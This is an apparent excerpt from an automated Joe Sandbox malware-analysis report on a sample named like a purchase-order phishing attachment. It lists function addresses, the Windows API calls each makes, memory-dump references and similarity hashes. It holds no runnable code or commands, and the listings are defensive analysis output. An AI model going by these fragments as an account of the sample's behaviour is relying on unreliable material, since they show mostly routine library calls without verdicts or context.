                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                        Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                        Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                        • String ID:
                                                        • API String ID: 1187119602-0
                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                        Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                        • String ID:
                                                        • API String ID: 1597257046-0
                                                        • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                        • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                        Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                        • String ID:
                                                        • API String ID: 237123855-0
                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                        Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconWindow
                                                        • String ID:
                                                        • API String ID: 3349847261-0
                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                        Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                        • String ID:
                                                        • API String ID: 2223660684-0
                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                        Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                        • EndPath.GDI32(?), ref: 00447336
                                                        • StrokePath.GDI32(?), ref: 00447344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 2783949968-0
                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                        Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                        Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                        Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                        Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                        Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                        • __freeptd.LIBCMT ref: 0041516B
                                                        • ExitThread.KERNEL32 ref: 00415173
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1454798553-0
                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                        Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _strncmp
                                                        • String ID: Q\E
                                                        • API String ID: 909875538-2189900498
                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                        Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
